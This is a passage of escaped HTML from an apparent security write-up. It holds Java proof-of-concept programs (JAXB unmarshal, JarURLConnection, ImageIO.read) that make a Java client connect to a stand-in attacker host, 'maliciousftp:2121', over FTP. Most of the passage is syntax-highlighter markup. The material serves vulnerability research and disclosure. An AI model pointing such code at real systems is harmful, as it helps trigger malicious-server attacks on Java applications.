class=\"crayon-s\">&#8220;ftp:\/\/maliciousftp:2121\/test&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-19\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">MalformedURLException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-21\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-22\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Unmarshaller <\/span><span class=\"crayon-v\">jaxbUnmarshaller<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-23\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-24\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">jaxbUnmarshaller<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jaxbContext<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createUnmarshaller<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-25\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">JAXBException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-26\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-27\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-28\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-29\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-t\">Object<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">test<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jaxbUnmarshaller<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">unmarshal<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-30\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">JAXBException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-31\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-32\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a0419148849-33\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a0419148849-34\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0036 seconds] -->  <\/p>\n<p><strong>java.net.JarURLConnection Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f0a3686072524\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import java.io.IOException;  import java.net.JarURLConnection;  import java.net.MalformedURLException;  import java.net.URL;  import java.util.jar.Manifest;    public class JavaUrl {     public static void main(String[] args) {    URL url = null;    try {     url = new URL(&#8220;jar:ftp:\/\/maliciousftp:2121\/duke.jar!\/&#8221;);    } catch (MalformedURLException e) {     e.printStackTrace();    }    JarURLConnection jarConnection = null;    try {     jarConnection = (JarURLConnection) url.openConnection();     jarConnection.setConnectTimeout(5000);     jarConnection.setReadTimeout(5000);      } catch (IOException e1) {     e1.printStackTrace();    }    try {     Manifest manifest = jarConnection.getManifest();    } catch (IOException e) {     e.printStackTrace();    }   }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a3686072524-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a3686072524-31\">31<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">io<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">IOException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">JarURLConnection<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">MalformedURLException<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">net<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">util<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">jar<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Manifest<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-7\"><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">JavaUrl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">static<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">URL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;jar:ftp:\/\/maliciousftp:2121\/duke.jar!\/&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-13\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">MalformedURLException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-14\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-15\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-16\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">JarURLConnection <\/span><span class=\"crayon-v\">jarConnection<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-17\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-18\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">jarConnection<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">JarURLConnection<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">openConnection<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-19\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">jarConnection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setConnectTimeout<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">5000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">jarConnection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setReadTimeout<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">5000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-21\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-22\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">IOException <\/span><span class=\"crayon-v\">e1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-23\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-24\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-25\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-26\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">Manifest <\/span><span class=\"crayon-v\">manifest<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jarConnection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getManifest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-27\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">IOException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-28\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-29\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59a739de8f0a3686072524-30\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a3686072524-31\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0032 seconds] -->  <\/p>\n<p><strong>javax.imageio.ImageIO Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739de8f0a6660483781\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import java.awt.Image;  import java.io.IOException;  import java.net.URL;  import javax.imageio.ImageIO;  import javax.swing.ImageIcon;  import javax.swing.JFrame;  import javax.swing.JLabel;    public class ImageReader {   public static void main(String[] args) {    Image image = null;    try {     URL url = new URL(&#8220;ftp:\/\/maliciousftp:2121\/test.jpg&#8221;);     image = ImageIO.read(url);    } catch (IOException e) {     e.printStackTrace();    }      JFrame frame = new JFrame();    frame.setSize(300, 300);    JLabel label = new JLabel(new ImageIcon(image));    frame.add(label);    frame.setVisible(true);   }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a6660483781-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a6660483781-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a6660483781-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a6660483781-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a6660483781-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a6660483781-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a6660483781-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a6660483781-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a6660483781-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a6660483781-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a6660483781-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a6660483781-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a6660483781-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a6660483781-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a6660483781-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a6660483781-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a6660483781-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a6660483781-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a6660483781-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a6660483781-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a6660483781-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a6660483781-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a6660483781-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59a739de8f0a6660483781-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59a739de8f0a6660483781-25\">25<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739de8f0a6660483781-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">java<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">awt<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">Image<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 